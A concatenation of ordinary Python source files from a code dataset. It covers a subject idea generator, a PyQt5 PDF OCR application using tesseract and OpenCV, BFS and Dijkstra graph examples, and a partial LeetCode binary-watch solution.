'Management Science': '8', \n 'Military': '9', 'Religions': '10',1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\t#print(sub_dept_dict[1]);\n\t#print('Hello World, I am back');\n\t#for i in (1, len(sub_dept_dict)):\n\t#\tprint(str(i)+':'+sub_dept_dict[i]);\n\t#\t#print('\\n');\n\t#def load_csv_data_to_list():\n\t#path_py = 'C:/rest/SJSU/Summer Sem/ML CMPE257/Tech Alchemy/nodejs_forum/python_gen/';\n\tpath_py = args.arguments[0];\n\targs.arguments[1] = sub_reverse_keys[args.arguments[1]];\n\targs.arguments[2] = sub_reverse_keys[args.arguments[2]];\n\t#print(path_py);\n\twith open(path_py+'CSV_Accounting.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Accounting_list = list(reader)\n\t\n\t#print(Key_Accounting_list[3][0])\n\t\n\twith open(path_py+'CSV_Banking_Finance_Insurance.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Banking_Finance_Insurance_list = list(reader)\n\t\n\t#print(Key_Banking_Finance_Insurance_list[3][0])\n\t\n\twith open(path_py+'CSV_Computer_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Computer_Science_list = list(reader)\n\t\n\t#print(Key_Computer_Science_list[3][0])\n\t\n\t\n\twith open(path_py+'CSV_Information_Management.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Information_Management_list = list(reader)\n\t\n\t#print(Key_Information_Management_list[3][0])\n\t\n\twith open(path_py+'CSV_Physics.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Physics_list = list(reader)\n\t\n\twith open(path_py+'CSV_Political_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Political_Science_list = list(reader)\n\t\n\t#print(Key_Political_Science_list[3][0])\n\t\n\t#print(Key_Physics_list[3][0])\n\t\n\twith open(path_py+'CSV_Properties.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Properties_list = list(reader)\n\t\n\t#print(Key_Properties_list[3][0])\n\t\n\twith open(path_py+'CSV_Management_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Management_Science_list = list(reader)\n\t\n\t#print(Key_Management_Science_list[3][0])\n\t\n\twith open(path_py+'CSV_Military.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Military_list = list(reader)\n\t\n\t#print(Key_Military_list[3][0])\n\t\n\t\n\twith open(path_py+'CSV_Religions.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Religions_list = list(reader)\n\t\n\t#print(Key_Religions_list[3][0])\n\t\n\tsub_list = list();\n\tideas_apply_process = list();\n\tideas_apply_concept = list();\n\tideas_common_things = list();\n\tideas_apply_properties = list();\n\tideas_combine = list();\n\tideas_combine = list();\n\tideas_if_there_is_no = list();\n\t\n\tfor i in range(1, len(args.arguments)):\n\t\t#print(args.arguments[i]);\n\t\tsub_list.append(sub_dept_dict[int(args.arguments[i])]);\n\t\t#print(sub_dept_dict[int(args.arguments[i])]);\n\t#print(sub_list);\n\t#load_csv_data_to_list();\n\t#subject_list = args.arguments;\n\t\n\tideas = Apply_the_process_A_to_B(args.arguments);\n\t\n\t#for idea in ideas:\n\t\t#print(idea);\n\t\n\tidea_strings = list();\n\tconcept_idea_1 = \"Apply the concept of \"+ ideas[0]+ \" in \"+ subject_department_dict_for_main[int(args.arguments[1])] + \" to \" + ideas[1] + \" in \"+subject_department_dict_for_main[int(args.arguments[2])];\n\tconcept_idea_2 = \"Apply the concept of \"+ ideas[1]+\" in \"+ subject_department_dict_for_main[int(args.arguments[2])] + \" to \" + ideas[0] + \" in \"+subject_department_dict_for_main[int(args.arguments[1])];\n\tdifference_common = \"Any different/ common things among \"+ ideas[0]+ \" from department \"+subject_department_dict_for_main[int(args.arguments[1])];\n\tcombine_idea = \" Combining these things : \"+ideas[0] +\" to invent new object\";\n\timprove_idea = \"Can we improve :\"+ideas[0] + \" in \" + subject_department_dict_for_main[int(args.arguments[1])];\n\tidea_strings.append(concept_idea_1);\n\tidea_strings.append(concept_idea_2);\n\tidea_strings.append(difference_common);\n\tidea_strings.append(combine_idea);\n\tidea_strings.append(improve_idea);\n\tidea_string_single_line ='';\n\tfor idea in idea_strings:\n\t\tidea_string_single_line+=idea+'||';\n\t\n\tprint(idea_string_single_line);\n\t","sub_path":"idea_gen_to_send/python_gen/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"90265221","text":"from PyQt5 import QtCore as qtc, QtGui as qtg, QtWidgets as qtw\nimport sys, os, shutil, logging\n\nlogging.basicConfig(filename='mfmcOCR.log', format='%(asctime)s %(name)s %(levelname)s:%(message)s', level=logging.WARNING)\nlogger = logging.getLogger (__name__)\n\n\nimport sys, os, shutil\nimport pdfplumber\n# import PyPDF2\n# import fitz # import for PyMuPDF\nfrom pdf2image import convert_from_path\nimport cv2\nimport pytesseract\nimport numpy as np\nimport imutils\nimport time\nimport ctypes\nmyappid = u'MFMC.MFMC-OCR.OCR.10' # set taskbar icon\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\nfrom textbox import Ui_MainWindowOCR\nfrom preview import Ui_MainWindowPreview\nfrom waiting import Ui_FormWaiting\nfrom loading import Ui_FormLoading\nfrom QOveride import MyQProgressDialog, Worker\n\n\n\nclass MainWindow(qtw.QMainWindow, Ui_MainWindowOCR):\n # Signals\n saveCurrentPreviewsSignal = qtc.pyqtSignal(bool)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.PDF_file = \"\"\n self.numPages = 0\n self.curPage = 1\n self.tempPath = \"\\\\OCR10temp\"\n self.curImg = np.array([])\n self.curStraightImg = None\n self.curPath = \"\"\n self.curAngle = 0\n self.curPagePreviews = [] #Different previews of current page as list\n self.save_file = \"\"\n self.saved = True\n self.mainChanged = True #tracker for whether Main changed\n self.progress = 0\n \n\n self.setupUi(self)\n # A list of all format-related widgets/actions, so we can disable/enable signals when updating.\n self.window2 = PreviewWindow()\n self.window2.move(850,25)\n\n\n self._format_actions = [\n # self.fonts,\n # self.fontsize,\n self.actionBold,\n self.actionItalic,\n self.actionUnderline\n # We don't need to disable signals for alignment, as they are paragraph-wide.\n ]\n\n\n # self.tabWidget.setCurrentIndex(0)\n self.update_format()\n self.openFile()\n \n\n \n\n #connect to slots\n self.actionOpen_File.triggered.connect (self.openFile)\n self.action_Save.triggered.connect (self.save)\n self.actionSave_As.triggered.connect (self.saveAs)\n self.actionQuit.triggered.connect (self.exit)\n self.actionCut.triggered.connect (self.cut_clicked)\n self.actionCopy.triggered.connect (self.copy_clicked)\n self.actionPaste.triggered.connect (self.paste_clicked)\n self.actionOCR_Page.triggered.connect (self.OCR_Page_selected)\n self.actionUndo.triggered.connect (self.undo_clicked)\n self.actionRedo.triggered.connect (self.redo_clicked)\n self.actionBold.toggled.connect (self.bold_toggled)\n self.actionItalic.toggled.connect (self.italic_toggled)\n self.actionUnderline.toggled.connect (self.underline_toggled)\n self.actionSelect_all.triggered.connect (self.select_all_clicked)\n self.actionAttributions.triggered.connect (self.attributions_selected)\n self.textEdit_Main.textChanged.connect (self.textChanged)\n self.actionCW90.triggered.connect (self.CW90_clicked)\n self.actionCCW90.triggered.connect (self.CCW90_clicked)\n self.action180.triggered.connect (self.R180_clicked)\n \n\n self.textEdit_Main.selectionChanged.connect(self.update_format)\n self.textEdit_Main.textChanged.connect(self.main_Changed)\n self.spinBox_Rotate.valueChanged.connect(self.rotate)\n self.spinBox_Page.valueChanged.connect(self.changePage)\n\n self.pushButton_OCR.clicked.connect (self.OCR_Page_selected)\n self.pushButton_CW.clicked.connect (self.CW90_clicked)\n self.pushButton_CCW.clicked.connect (self.CCW90_clicked)\n self.pushButton_FirstPage.clicked.connect (self.firstPage)\n self.pushButton_PrevPage.clicked.connect (self.prevPage)\n self.pushButton_NextPage.clicked.connect (self.nextPage)\n self.pushButton_LastPage.clicked.connect (self.lastPage)\n self.label_Image.wheelTurnUp.connect(self.prevPage)\n self.label_Image.wheelTurnDown.connect(self.nextPage)\n self.label_Image.dropFile.connect(self.dropPDF)\n\n self.saveCurrentPreviewsSignal.connect (self.saveCurrentPreviews)\n \n \n\n self.move(100,0)\n self.show()\n\n def dropPDF(self, filename):\n try:\n _, filename = filename.split('///')\n except:\n try:\n _, filename = filename.split(':')\n except:\n return\n if os.path.isfile(filename) and filename.lower().endswith(\".pdf\"):\n if not self.saved:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Yes:\n self.save_file()\n elif ans == qtw.QMessageBox.Cancel:\n return\n self.PDF_file = filename\n\n self.loading = Loading()\n self.loading.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n self.window2.hide()\n qtw.QApplication.processEvents()\n worker = Worker(self.changePDF, self.PDF_file)\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high and high < 1:\n high = self.progress\n self.loading.progressBar.setValue(int(high * 100))\n qtw.QApplication.processEvents()\n self.label_totalPages.setText(f\"of {self.numPages}\")\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.hide()\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n\n self.setEnabled(True)\n self.window2.setEnabled(True)\n self.loading.close()\n\n # self.changePDF(self.PDF_file)\n\n def openFile (self):\n #choose PDF file to open\n if not self.saved:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Yes:\n self.save_file()\n elif ans == qtw.QMessageBox.Cancel:\n return\n options = qtw.QFileDialog.Options()\n filename = \"\"\n filename, _ = qtw.QFileDialog().getOpenFileName(self,\"File to OCR\",\"\", \"PDF files (*.pdf);; All Files (*)\", options=options)\n if not filename:\n return\n self.PDF_file = filename\n\n self.loading = Loading()\n self.loading.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n self.window2.hide()\n qtw.QApplication.processEvents()\n worker = Worker(self.changePDF, self.PDF_file)\n logging.info(\"location openFile 1\")\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high and high < 1:\n high = self.progress\n self.loading.progressBar.setValue(int(high * 100))\n qtw.QApplication.processEvents()\n self.label_totalPages.setText(f\"of {self.numPages}\")\n logging.info(\"location openFile 2\")\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n logging.info(\"location openFile 3\")\n\n self.setEnabled(True)\n self.window2.setEnabled(True)\n self.loading.close()\n\n def changePDF (self, pdf_file):\n #change new PDF\n # pdf = fitz.open(pdf_file)\n # number_of_pages = pdf.pageCount\n # if number_of_pages == 0:\n # return\n # self.numPages = number_of_pages\n # self.curPagePreviews = []\n # for i in range(number_of_pages):\n # page = pdf.loadPage(i)\n # text = page.getText(\"text\")\n # if not text:\n # text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n # self.curPagePreviews.append([text,\"\",\"\",\"\"])\n\n\n\n # pdf = open(pdf_file, 'rb')\n # read_pdf = PyPDF2.PdfFileReader(pdf)\n \n # number_of_pages = read_pdf.getNumPages()\n # if number_of_pages == 0:\n # return\n # self.numPages = number_of_pages\n # self.curPagePreviews = []\n # for i in range(number_of_pages):\n # page = read_pdf.getPage(i)\n # text = page.extractText()\n # if text == None:\n # text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n # self.curPagePreviews.append([text,\"\",\"\",\"\"])\n\n\n logging.info(\"location ChangePDF1\")\n\n pdf = pdfplumber.open(pdf_file)\n pages = pdf.pages\n if len(pages) == 0:\n return\n self.numPages = len(pages)\n logging.info(\"location ChangePDF2\")\n self.curPagePreviews = []\n for page in pages:\n text = page.extract_text()\n if text == None:\n text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n self.curPagePreviews.append([text,\"\",\"\",\"\"])\n logging.info(\"location ChangePDF3\")\n \n\n self.progress = 0.1\n pages = convert_from_path(pdf_file, 350)\n self.progress = 0.5\n if not os.path.isdir(self.tempPath):\n os.mkdir(self.tempPath)\n i = 1\n logging.info(\"location ChangePDF4\")\n for page in pages:\n image_name = os.path.join(self.tempPath, \"Page_\" + str(i) + \".jpg\")\n page.save(image_name, \"JPEG\")\n self.progress = 0.5 + i/self.numPages/2\n i = i+1\n self.setPage(1, new=True)\n self.progress = 2\n logging.info(\"location ChangePDF5\")\n return\n\n def setPage (self, pageNo = 1, new=False):\n self.mainChanged = True\n self.saveCurrentPreviewsSignal.emit(new)\n self.curPage = pageNo\n image_name = os.path.join(self.tempPath, \"Page_\" + str(pageNo) + \".jpg\")\n if not os.path.exists (image_name):\n image_name = \":/newPrefix/mfmc logo 2015.jpg\"\n self.curPath = image_name\n self.curImg = cv2.imread(image_name) \n self.curStraightImg = self.curImg.copy() \n\n def showImg (self, img):\n height, width = img.shape[:2]\n bytesPerLine = 3 * width \n qImg = qtg.QImage(img.data, width, height, bytesPerLine, qtg.QImage.Format_RGB888)\n self.label_Image.setPixmap(qtg.QPixmap(qImg))\n\n def tesseractPage (self, img):\n self.progress = 0.1\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.progress = 0.4\n self.curPagePreviews[self.curPage-1][1] = text\n\n kernel = np.ones((1,1), np.uint8)\n img = cv2.dilate(img, kernel, iterations=1)\n img = cv2.erode(img, kernel, iterations=1)\n img = cv2.GaussianBlur(img, (5,5), 0)\n img = cv2.medianBlur(img,5)\n\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.progress = 0.70\n self.curPagePreviews[self.curPage-1][2] = text\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n adaptive_threshold = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 85, 11)\n img = adaptive_threshold\n\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.curPagePreviews[self.curPage-1][3] = text\n self.progress = 1.1\n\n def saveAs (self):\n options = qtw.QFileDialog.Options()\n filename = \"\"\n filename, _ = qtw.QFileDialog.getSaveFileName(self,\"Save to file\", self.save_file, \"text files (*.txt);;HTML files (*.html);; All Files (*)\", options=options)\n if filename:\n self.save_file = filename\n self.save()\n\n def save (self):\n if self.save_file == \"\":\n self.saveAs()\n else:\n with open(self.save_file, \"w\", encoding='utf-8') as f2:\n if self.save_file.lower().endswith('.html'):\n f2.write(self.textEdit_Main.toHtml())\n else:\n f2.write(self.textEdit_Main.toPlainText())\n self.saved = True\n\n def exit(self):\n if self.saved == False:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Cancel:\n return\n elif ans == qtw.QMessageBox.Yes:\n self.save()\n try:\n shutil.rmtree(\"\\OCR10temp\", ignore_errors=True)\n except:\n pass\n\n self.window2.close()\n self.close()\n\n def want_to_save(self):\n #returns true if want to save unsaved data\n msgBox = qtw.QMessageBox()\n msgBox.setIcon(qtw.QMessageBox.Warning)\n msgBox.setText(\"Document not saved. Do you want to save now?\")\n msgBox.setWindowTitle(\"Not Saved Warning\")\n msgBox.setStandardButtons(qtw.QMessageBox.Yes | qtw.QMessageBox.No | qtw.QMessageBox.Cancel)\n returnValue = msgBox.exec()\n return returnValue\n\n\n\n#####################\n# SLOTS #\n#####################\n\n def saveCurrentPreviews(self, new):\n if not new:\n self.curPagePreviews[self.curPage-1]=[self.window2.textEdit_Preview_1.toHtml(), self.window2.textEdit_Preview_2.toHtml()\n , self.window2.textEdit_Preview_3.toHtml(), self.window2.textEdit_Preview_4.toHtml()]\n else:\n self.curPagePreviews[self.curPage-1][1]=self.window2.textEdit_Preview_2.toHtml()\n self.curPagePreviews[self.curPage-1][2]=self.window2.textEdit_Preview_3.toHtml()\n self.curPagePreviews[self.curPage-1][3]=self.window2.textEdit_Preview_4.toHtml()\n\n\n def main_Changed(self):\n self.mainChanged = True\n\n def preview_Changed(self):\n self.mainChanged = False\n\n def cut_clicked(self):\n self.textEdit_Main.cut()\n \n def copy_clicked(self):\n self.textEdit_Main.copy()\n \n def paste_clicked(self):\n self.textEdit_Main.paste()\n\n def undo_clicked(self):\n self.textEdit_Main.undo()\n\n def redo_clicked(self):\n self.textEdit_Main.redo()\n\n def bold_toggled(self):\n if self.actionBold.isChecked():\n self.textEdit_Main.setFontWeight(qtg.QFont.Bold)\n else:\n self.textEdit_Main.setFontWeight(qtg.QFont.Normal)\n\n def italic_toggled(self):\n self.textEdit_Main.setFontItalic(self.actionItalic.isChecked())\n\n def underline_toggled(self):\n self.textEdit_Main.setFontUnderline(self.actionUnderline.isChecked())\n\n def select_all_clicked(self):\n self.textEdit_Main.selectAll()\n\n def block_signals(self, objects, b):\n for o in objects:\n o.blockSignals(b)\n\n def update_format(self):\n \"\"\"\n Update the font format toolbar/actions when a new text selection is made. This is neccessary to keep\n toolbars/etc. in sync with the current edit state.\n :return:\n \"\"\"\n # Disable signals for all format widgets, so changing values here does not trigger further formatting.\n self.block_signals(self._format_actions, True)\n\n # self.fonts.setCurrentFont(self.editor.currentFont())\n # # Nasty, but we get the font-size as a float but want it was an int\n # self.fontsize.setCurrentText(str(int(self.editor.fontPointSize())))\n self.actionItalic.setChecked(self.textEdit_Main.fontItalic())\n self.actionUnderline.setChecked(self.textEdit_Main.fontUnderline())\n self.actionBold.setChecked(self.textEdit_Main.fontWeight() == qtg.QFont.Bold)\n\n # self.alignl_action.setChecked(self.editor.alignment() == Qt.AlignLeft)\n # self.alignc_action.setChecked(self.editor.alignment() == Qt.AlignCenter)\n # self.alignr_action.setChecked(self.editor.alignment() == Qt.AlignRight)\n # self.alignj_action.setChecked(self.editor.alignment() == Qt.AlignJustify)\n\n self.block_signals(self._format_actions, False)\n\n \n def OCR_Page_selected(self):\n if self.curImg.size == 0:\n return\n self.waiting = Waiting()\n self.waiting.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n qtw.QApplication.processEvents()\n worker = Worker(self.tesseractPage, self.curImg)\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high:\n high = self.progress\n self.waiting.progressBar.setValue(int(self.progress*100))\n qtw.QApplication.processEvents()\n self.setEnabled(True)\n self.window2.setEnabled(True)\n self.window2.textEdit_Preview_2.setText(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setText(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setText(self.curPagePreviews[self.curPage-1][3])\n self.window2.textEdit_Preview_1.setText(self.curPagePreviews[self.curPage-1][0])\n self.window2.show()\n self.window2.activateWindow()\n\n self.waiting.close()\n\n def attributions_selected(self):\n qtw.QMessageBox.information(self, \"MFMC OCR\"\n , \"Icons by VisualPharm; http://creativecommons.org/licenses/by-nd/3.0/ web page\")\n\n def update_spinBox_Rotate(self, newAngle = 0):\n while newAngle < 0:\n newAngle += 360\n newAngle = newAngle % 360\n self.spinBox_Rotate.setValue(newAngle)\n self.curAngle = newAngle\n self.curImg = imutils.rotate_bound(self.curStraightImg, self.curAngle)\n self.showImg(self.curImg)\n\n def CW90_clicked(self):\n self.update_spinBox_Rotate(self.curAngle+90)\n\n def CCW90_clicked(self):\n self.update_spinBox_Rotate(self.curAngle-90)\n\n def R180_clicked(self):\n self.update_spinBox_Rotate(self.curAngle+180)\n\n def rotate(self):\n angle = self.spinBox_Rotate.value()\n self.update_spinBox_Rotate(angle)\n\n def changePage(self):\n if self.spinBox_Page.value() == self.curPage:\n return\n if self.spinBox_Page.value() > self.numPages:\n self.spinBox_Page.setValue(self.numPages)\n elif self.spinBox_Page.value() < 1:\n self.spinBox_Page.setValue(1)\n self.setPage(self.spinBox_Page.value())\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n\n\n def firstPage(self):\n self.spinBox_Page.setValue(1)\n \n def prevPage(self):\n if self.spinBox_Page.value() <= 1:\n self.spinBox_Page.setValue(1)\n return\n self.spinBox_Page.setValue(self.spinBox_Page.value() - 1)\n \n def nextPage(self):\n if self.spinBox_Page.value() >= self.numPages:\n self.spinBox_Page.setValue(self.numPages)\n return\n self.spinBox_Page.setValue(self.spinBox_Page.value() + 1)\n \n def lastPage(self):\n self.spinBox_Page.setValue(self.numPages)\n \n def keyPressEvent(self, e):\n if e.key() == qtc.Qt.Key_Escape:\n self.exit()\n\n def closeEvent(self,e):\n self.exit()\n\n def textChanged(self):\n self.saved = False\n\n\n##########################\n# PREVIEW WIDGET #\n##########################\n\n\nclass PreviewWindow(qtw.QMainWindow, Ui_MainWindowPreview):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n \n self.actionCut.triggered.connect (self.cut_clicked)\n self.actionCopy.triggered.connect (self.copy_clicked)\n self.actionPaste.triggered.connect (self.paste_clicked)\n self.actionUndo.triggered.connect (self.undo_clicked)\n self.actionRedo.triggered.connect (self.redo_clicked)\n\n self.pushButton_Clear_1.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_1.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_2.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_2.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_3.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_3.clicked.connect (self.ToClip_clicked)\n self.pushButton_Clear_4.clicked.connect (self.Clear_clicked)\n self.pushButton_ToClip_4.clicked.connect (self.ToClip_clicked)\n\n\n #########################\n # SLOTS #\n #########################\n\n def cut_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.cut()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.cut()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.cut()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.cut()\n \n def copy_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.copy()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.copy()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.copy()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.copy()\n \n def paste_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.paste()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.paste()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.paste()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.paste()\n \n def undo_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.undo()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.undo()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.undo()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.undo()\n \n def redo_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.redo()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.redo()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.redo()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.redo()\n\n def Clear_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.clear()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.clear()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.clear()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.clear()\n\n def ToClip_clicked(self):\n if self.tabWidget.currentIndex() == 0:\n self.textEdit_Preview_1.selectAll()\n self.textEdit_Preview_1.copy()\n elif self.tabWidget.currentIndex() == 1:\n self.textEdit_Preview_2.selectAll()\n self.textEdit_Preview_2.copy()\n elif self.tabWidget.currentIndex() == 2:\n self.textEdit_Preview_3.selectAll()\n self.textEdit_Preview_3.copy()\n elif self.tabWidget.currentIndex() == 3:\n self.textEdit_Preview_4.selectAll()\n self.textEdit_Preview_4.copy()\n\n def closeEvent(self,e):\n self.setVisible = False\n\nclass Loading(qtw.QWidget, Ui_FormLoading):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n\nclass Waiting(qtw.QWidget, Ui_FormWaiting):\n # Signals\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.setupUi(self)\n\n\n \n\n\n#####################\n# MAIN #\n#####################\nif __name__ == '__main__':\n app = qtw.QApplication(sys.argv)\n window = MainWindow()\n \n \n sys.exit(app.exec_())\n ","sub_path":"mfmcOCR.py","file_name":"mfmcOCR.py","file_ext":"py","file_size_in_byte":25108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295924659","text":"# breadth-first search - BFS\ngraph = {}\ngraph[\"you\"] = [\"alice\", \"bob\", \"claire\"]\ngraph[\"bob\"] = [\"anuj\", \"peggy\"]\ngraph[\"alice\"] = [\"peggy\"]\ngraph[\"claire\"] = [\"tom\", \"jhonny\"]\ngraph[\"anuj\"] = []\ngraph[\"peggy\"] = []\ngraph[\"tom\"] = []\ngraph[\"jhonny\"] = []\n\nfrom collections import deque\n\ndef person_is_seller(name):\n return name[-1] == 'm' #random way to decide who is a seller\n\ndef search(name):\n search_queue = deque()\n search_queue += graph[name]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\nsearch(\"you\")\n\n\n\n# dijkstra algorithm (only works with positive weights)\n\ngraph = {}\ngraph[\"start\"] = {}\ngraph[\"start\"][\"a\"] = 6\ngraph[\"start\"][\"b\"] = 2\n\n# neighbors\nprint(graph[\"start\"].keys())\n\n# weight of the edges from both neighbors\nprint(graph[\"start\"][\"a\"])\nprint(graph[\"start\"][\"b\"])\n\n# add rest of nodes and neighbors to the graph\ngraph[\"a\"] = {}\ngraph[\"a\"][\"fin\"] = 1\n\ngraph[\"b\"] = {}\ngraph[\"b\"][\"a\"] = 3\ngraph[\"b\"][\"fin\"] = 5\n\ngraph[\"fin\"] = {}\n\ninfinity = float(\"inf\")\ncosts = {}\ncosts[\"a\"] = 6\ncosts[\"b\"] = 2\ncosts[\"fin\"] = infinity\n\nparents = {}\nparents[\"a\"] = \"start\"\nparents[\"b\"] = \"start\"\nparents[\"fin\"] = None\n\nprocessed = []\n\n\ndef find_lowest_cost_node(costs):\n lowest_cost = infinity\n lowest_cost_node = None\n for node in costs:\n cost = costs[node]\n if cost < lowest_cost and node not in processed:\n lowest_cost = cost\n lowest_cost_node = node\n return lowest_cost_node\n\n\nnode = find_lowest_cost_node(costs)\nwhile node is not None:\n cost = costs[node]\n neighbors = graph[node]\n for n in neighbors.keys():\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost:\n costs[n] = new_cost\n parents[n] = node\n processed.append(node)\n node = find_lowest_cost_node(costs)\n\nprint(costs)","sub_path":"data_structures/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307629217","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n401. Binary Watch\n\nA binary watch has 4 LEDs on the top which represent the hours (0-11),\nand the 6 LEDs on the bottom represent the minutes (0-59).\nEach LED represents a zero or one, with the least significant bit on the right.\nFor example, the above binary watch reads \"3:25\".\nGiven a non-negative integer n which represents the number of LEDs that are currently on,\nreturn all possible times the watch could represent.\n\nExample:\n Input: n = 1\n Return: [\"1:00\", \"2:00\", \"4:00\", \"8:00\", \"0:01\", \"0:02\", \"0:04\", \"0:08\", \"0:16\", \"0:32\"]\n\nNote:\n The order of output does not matter.\n The hour must not contain a leading zero, for example \"01:00\" is not valid, it should be \"1:00\".\n The minute must be consist of two digits and may contain a leading zero,\n for example \"10:2\" is not valid, it should be \"10:02\".\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n@author: houxue\n@date: 2016/12/11\n\"\"\"\n\n\ndef count_bit(num):\n cnt = 0\n while num:\n num &= num - 1\n cnt += 1\n return cnt\n\n\nclass Solution(object):\n def readBinaryWatch(self, num):\n \"\"\"\n :type num: int\n :rtype: List[str]\n \"\"\"\n res = []\n for h in range(12):\n for m in range(60):\n if (bin(h)+bin(m)).count('1') == num:\n 